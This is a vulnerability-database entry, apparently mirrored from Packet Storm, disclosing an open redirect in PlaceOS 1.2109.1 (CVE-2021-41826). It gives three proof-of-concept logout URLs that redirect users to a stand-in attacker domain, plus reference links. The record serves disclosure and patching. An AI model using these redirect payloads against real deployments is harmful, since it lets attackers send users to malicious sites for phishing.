Lucene search
Hamza KhedrPACKETSTORM:164345HistorySep 30, 2021 - 12:00 a.m.
PlaceOS 1.2109.1 Open Redirection
2021-09-3000:00:00
Hamza Khedr
packetstormsecurity.com
216
EPSS
0.873
Percentile
98.7%
`# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
# Date: 29-09-2021
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
# Vendor Homepage: https://place.technology/
# Software Link: https://github.com/PlaceOS
# Version: < 1.29.10
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-41826
#
#
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
# "https://office.example.com/auth/logout?continue=.attacker.com"
# "https://office.example.com/auth/logout?continue=:[email protected]"
#
#
# Reference: https://github.com/PlaceOS/auth/issues/36
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826
`
Related
exploitdb
exploitdb
PlaceOS 1.2109.1 - Open Redirection
2021-09-30 00:00:00
prion
prion
Open redirect
2021-09-30 00:15:00
nvd
nvd
CVE-2021-41826
2021-09-30 00:15:07
cnvd
cnvd
PlaceOs Authentication Service Input Validation Error Vulnerability
2021-10-14 00:00:00
cve
cve
CVE-2021-41826
2021-09-30 00:15:07
nuclei
nuclei
PlaceOS 1.2109.1 - Open Redirection
2021-09-30 17:19:17
cvelist
cvelist
CVE-2021-41826
2021-09-29 23:41:16